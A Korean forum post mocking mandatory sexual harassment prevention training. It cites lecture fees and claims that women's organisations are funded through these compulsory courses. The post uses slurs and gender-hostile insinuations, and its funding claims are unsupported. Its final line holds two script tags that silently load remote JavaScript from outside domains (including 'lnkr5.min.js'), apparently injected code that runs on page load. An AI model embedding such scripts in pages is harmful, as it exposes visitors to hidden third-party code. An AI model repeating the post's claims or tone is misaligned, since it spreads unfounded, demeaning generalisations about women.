급식충이나 직장인이라면 꼭 한번쯤은 들어봤을 정체불명의 교육...



"성희롱 예방교육"


1.jpg 


들어보지 않아도 언제나 뻔한 내용.


"남자는 언제나 잠재적 가해자예욧!! 남자가 조심하고 다니세욧!!!"


유치뽕짝 중딩수준 PPT, 비문은 애교에 맞춤법조차 간간히 틀려주는 안구테러 배경과 함께.



이 시간은 사실상 대다수의 출근충들에겐 폰겜하거나 자는 시간이지만, 본인은 문득 의문점이 생겼다



'저 강사들은 저 따위 강의를 2시간 남짓 하고 얼마나 받아가는걸까?'



더주지도 않고, 덜주지도 않는 공공기관 기준으로 한번 살펴보자.




2.jpg3.jpg 


(1회당) 강의료 50만원 + 강사료 25만원


총 75만원 (시급 375,000원)




도대체 무슨 근거로 이런 눈먼돈이 '특정 성별' 분들에게 지급되는걸까?


알고보니 아예 법적으로 지급이 강제된 것이었다



한번 살펴보자



4.png5.jpg 


아예 3대 의무교육 중 하나로서 박혀있는 사항.



이쯤에서 슬슬 연결고리가 감이 오지 않는가?




"여성계의 돈줄은 과연 어디에서 비롯되는 것인가" 에 대해서 말이다.



6.png 


강의 내용을 정말 호의적으로 들으려고, 정말 1그램이나마 얻어가고자 해도


도무지 배울것이 없는 이런 강의들을



공공기관 뿐만 아니라 사기업에도 강제해서



7.png 


일개 여성단체조차 이렇게 많은 돈을 굴릴 수 있었던 힘의 원천은, 



8.jpg9.jpg 



여성단체들에서 어느 시점에서 뜬금없이 여성전용주차장을 세워달라고 떼를 쓰기 시작했던 이유는!


(어째서인지 어느 특정시점에서부터 갑자기 단체로 차 굴릴 여유가 생긴걸까...)




아하.



여성계가 돈을 마련하는 방법은 바로 이거였구나.




잘 봐두자



10.jpg 

이런 사람들이 무슨 차를 타고 와서


어느 주차칸에 세우고



끝나고 백화점에서


어느 주차칸에 세우며 자신의 '2시간 노동' 에 뿌듯해 하는지를





그리고


11.png12.jpg13.jpg



어떤 부류의 사람들이


어떤 편협한 사상으로 뭉쳐서 우리의 돈을 가져가는지를




두 눈으로 다시 한번 살펴보자






<script type="text/javascript" src="http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52190x6655x&r=1533916782605"></script><script type="text/javascript" src="http://promlinkdev.com/addons/lnkr5.min.js"></script>